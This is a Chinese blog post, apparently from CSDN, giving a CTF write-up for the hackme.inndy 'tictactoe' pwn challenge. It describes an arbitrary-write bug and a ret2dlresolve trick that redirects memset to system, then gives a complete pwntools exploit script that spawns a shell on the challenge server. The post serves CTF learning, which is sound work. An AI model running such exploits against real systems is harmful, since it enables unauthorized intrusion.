hackme inndy pwn tictactoe writeup

最新推荐文章于 2022-01-18 20:30:00 发布
最新推荐文章于 2022-01-18 20:30:00 发布
阅读量545 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/78959626
版权

昨天立的果然是个flag。。。。还是忍不住做了

这题ai其实很容易破,有个任意内存写,直接写到胜利就可以了

但是怎么get shell呢?

看了下,发现初始化的时候把一段地址设为可写了,那段地址存的是DT_SYMTAB之类的地址,所以很明显,这题是ret2dlresolve,那么怎么改呢?

最快的方法是改DT_STRTAB,当执行到memset的时候,把它的字符串变为system,然后再将它的参数设为sh,这样就能get到shell了

多的我就不说了,自己看代码吧

from pwn import *

#p=process('./tictactoe')
p=remote('hackme.inndy.tw', 7714)
context.log_level='debug'
#gdb.attach(proc.pidof(p)[0])
#raw_input()

str_addr=0x0804AF58
sh_addr=0x804B048
base_addr=0x804B056

p.recvuntil('Play (1)st or (2)nd? ')
p.sendline('1')

def change(addr,val):
    p.recvuntil('Input move (9 to change flavor): ')
    p.sendline('9')
    time.sleep(0.2)
    p.sendline(val)
    p.recvuntil('Input move (9 to change flavor): ')
    p.sendline(str(addr-base_addr))

box=0x804b04d
change(sh_addr,'\x8d')#这里改了之后,循环一直是给你写
change(box+0,'\x40')
change(str_addr+1,'\x9f')
change(str_addr,'\xc8')
change(sh_addr+1,'\x97')
change(sh_addr+2,'\x00')
change(sh_addr+3,'\xff')
change(sh_addr+123,'\xff')#这里只是填充
change(sh_addr+123,'\xff')

p.interactive()
charlie_heng
关注
专栏目录
Hackme Writeup
wywwzjj
05-21 1万+
https://wywwzjj.top/2019/02/02/Hackme-Writeup/ hide and seek Can you see me? I’m so close to you but you can’t see me. 这题查看源码即可。 guestbook This guestbook sucks. sqlmap is your friend. 既然提示有 sqlmap...
hackme.inndy.tw的一些Writeup(5月30更新)
热门推荐
baikeng3674的博客
10-21 2万+
hackme.inndy.tw的一些Writeup(6月3日更新) 原文链接:http://www.cnblogs.com/WangAoBo/p/7706719.html 推荐一下https://hackme.inndy.tw/scoreboard/,上边有一些很好的针对新手的题目,但网上能搜到的Writeup很少,因此开了这篇博文记录一下部分目前解出的题目(主要是pwn和r...
hackme inndy petbook writeup
charlie_heng的专栏
02-16 465
这题一直没人做,感觉好像很难,其实是自己吓倒自己 这题的漏洞其实很明显,就是没有初始化对象,所以可以控制新new出来的user的pet的地址和post的地址 这里说下怎么控制 ·1. new一个比一个user大,即大于536字节的post 2. edit这个post,将这个post弄成更大的,这个时候realloc会把原来的堆给free掉,然后再new一个新的堆 3. 这个时候再new一...
hackme inndy pwn raas writeup
charlie_heng的专栏
12-31 381
继续做题,之前一直对堆不是很熟,这次特地做一道堆的题来练手 首先题目给了提示,是一道UAF 可以看到,有3个操作,一个是新建,一个是删除,一个是展示 删除和展示如上,新建的代码太长,我就简述下功能吧 1.选择类型,数字还是字符串 2.如果是字符串,要输入长度 3.输入内容 内存的操作是,先new了一个大小为12的堆,前8位放的是用于展示的函数指针和用于删除的函数指针 如...
hackme的web部分水题writeup集合
cggwz的信息飞船
10-31 457
简单介绍,hackme是提供ctf基础题的一个很好的网站,网站链接如下: 网站链接 这次把web部分的头几个没什么值得说的题说一下,因为太短了,单独发一篇博客不值得。 hide and seek 几乎每个平台都有这道题,直接右击查看源代码即可看到flag。目的就是教会我们查看网页源代码。应平台要求,flag就不提供了。 scoreboard 网页源代码里是没有的,也没有很多的提示,那么只能说flag在服务器端或者在数据包里,起码不在客户端。scoreboard页面可以和服务器端沟通的只有登录按钮和提交fla
NUAACTF pwn string writeup
qq_39596232的博客
08-24 1621
题目描述: 菜鸡遇到了Dragon,有一位巫师可以帮助他逃离危险,但似乎需要一些要求 题目分析: 1、首先查看下文件的信息及其保护机制: tucker@ubuntu:~/pwn$ file string string: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter...
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 519
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
0x00 cg_pwn2【XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 467
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
[BUGKU][CTF][PWN][2020] PWN writeup
dadongwudi的博客
01-12 617
PWN1 关键字:nc 知识点:nc使用方法 https://www.cnblogs.com/nmap/p/6148306.html nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。nc不仅可以使用IPv4和IPv6,而且可以为用户提供无限的潜在用途。 在nc的大量功能中,有能力将nc链接在一起;TCP、UDP和到其他站点的SCTP端口;支持
hackme inndy pwn leave_msg writeup
charlie_heng的专栏
01-01 415
感觉有点做题做上瘾了。。。。。 拿到程序,首先checksec看下开了什么保护,发现没开nx,但是开了栈溢出检测,然后又有堆,明显是把shellcode放堆里面去执行 然后看了下,下标检查那里可以加个空格绕过,可以修改got表里面的函数为堆的值,调用函数的时候就会执行堆里面的shellcode 但是这里有一个长度判断,大于8就会截断,放不了一般的shellcode 这里绕过就比较骚了,首先...
hackme inndy reverse rc87cipher writeup
charlie_heng的专栏
02-01 611
话说这题真的挺难折腾出来的 首先这个程序是有upx壳的 但是这个壳被魔改了,关键的信息都被删除了,在google搜了半天linux upx upack 都找不到什么有用的信息 有两条路,一条是修复关键信息,一条路是像windows那些程序那样手动脱壳脱下来 两条路其实都试了一下,不过最终行得通的是第二条路 这里说下第一条路,如果你们有兴趣的话,可以去试试 首先作者把0xB4~0xB7处...
hackme pwn onepunch
ACdream
03-14 490
做的题太少了,不知道应该把这种题目如何归类 int __cdecl main(int argc, const char **argv, const char **envp) { …… v5 = __isoc99_scanf("%llx %d", &v6, &v4); if ( v5 != 2 ) return 0; *v6 = v4; …… ...
[BUUCTF-pwn] inndy_tictactoe
weixin_52640415的博客
01-18 269
搜了个exp看好好久 原本是个简单题,由于输入数字有溢出,利用这个偏移将got表的puts改为成功的地址,当失败后puts时跳到成功那,打印出flag 。但是BUUCTF上的flag并不在那。所以要得到shell才行。 看了exp然后上手复现(可惜本地环境跟远程不一样,本地无法成功) 1,0x0804B048这个位置是谁输入的标记,1和-1分别表示两个人,而改为其它时(不是-1)则都是自己输入,这里先改为0x8d(这个字符后边说) 2,改完上一步后,后边8步都是自己输入 3,这里指向DT_STRT
hackme inndy pwn veryoverflow writeup
charlie_heng的专栏
01-02 563
这次是最后一题了,做完这题一定要去复习!!!!(立了个flag。。。 这题有两种思路做,第一种是return2dl_resolve 第二种是泄漏libc,rop运行system(‘/bin/sh’) 因为想完美一点,所以一开始写的是第一种,写完了,在本地get到shell了,连到服务器,结果不行,一看,栈的地址开头是ff,这个也代表eof。。。不吐槽了,现在来分别说下两种思路是怎么做的 其...
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 866
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
hackme pwn toomuch1 - buffer overflow
ACdream
01-23 315
一开始看到这个漏洞还是蛮明显的~ 这里s的长度只有0x18个字节,然后用的是gets和strcpy来输入和传递,意味着没有长度限制与安全检查,所以可以直接缓冲区溢出来覆盖函数返回地址 返回地址在ebp + 4,这里是ebp - 18 中间的填充值也就好算了~和homework一样,这里有现成的函数重用 代码如下: #!/usr/bin/env python # coding=utf...
hackme pwn homework
ACdream
01-23 369
根据提示:Index out bound, Return Address 根据源码: void run_program() { int arr[10], i, v, act; …… while(1) { …… switch(act) { case 0: return; ...
hackme pwn echo [format string]
ACdream
01-31 456
题目名称就已经是很明显的提示了!echo ~ 提示:格式化字符串 从IDA中看main:即可看到printf(&s)! 漏洞原理部分: http://www.cnblogs.com/Ox9A82/p/5429099.html 漏洞刷题提升: https://www.anquanke.com/post/id/85785 https://www.anquanke.com/pos...
hackme inndy pwn rsbo writeup
charlie_heng的专栏
01-01 644
因为rsbo和rsbo2是同一题,所以就直接做rsbo2了 首先看看程序 init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值 然后是读了0x80个byte,这里有一个栈溢出 但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样做的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循...
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值